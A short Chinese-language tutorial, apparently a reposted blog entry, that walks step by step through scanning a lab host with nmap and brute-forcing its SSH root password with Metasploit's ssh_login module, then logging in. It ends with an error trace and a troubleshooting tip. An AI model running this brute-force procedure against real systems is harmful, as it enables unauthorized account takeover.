auxiliary/scanner/ssh/ssh_login 這個模塊掃描很慢,建議使用其它多執行緒工具掃描,
-
在終端中輸入命令“nmap 192.168.1.3”,對目標主機進行埠掃描,發現主機開放22埠;
-
在終端中輸入命令“msfconsole”,啟動MSF終端
-
在終端中輸入命令“search ssh_login”,搜索ssh_login的相關工具和攻擊載荷;
-
在終端中輸入命令“use auxiliary/scanner/ssh/ssh_login”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下;
-
在終端中輸入命令“show options”,查看需要設定的相關項,“yes”表示必須填寫的引數;
-
在終端中輸入命令“set RHOST 192.168.1.3”,設定目標主機的IP地址;
-
在終端中輸入“set USERNAME root”,指定登陸用戶名root;
-
在終端中輸入“set PASS_FILE /home/passwd.txt”,設定暴利破解的密碼檔案路徑;
-
在終端中輸入“set THREADS 50”,設定暴利破解的執行緒數為50;
-
在終端中輸入“run”,開始向目標主機爆破ssh的登陸帳號和密碼,如果爆破成功,就會顯示登陸帳號為root,密碼為Xxx;
-
在終端中輸入“ssh [email protected]”,連接目標主機;
注意:
在掃描中,如果使用ctr + c 中斷之后,重新run ,就會報錯,我想到的解決方式就是重新打開msf,
[-] Auxiliary failed: JSON::ParserError 783: unexpected token at '<h1>Internal Server Error</h1>'
[-] Call stack:
[-] /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/json-2.3.0/lib/json/common.rb:156:in `parse'
...
參考
https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/21011.html
標籤:其他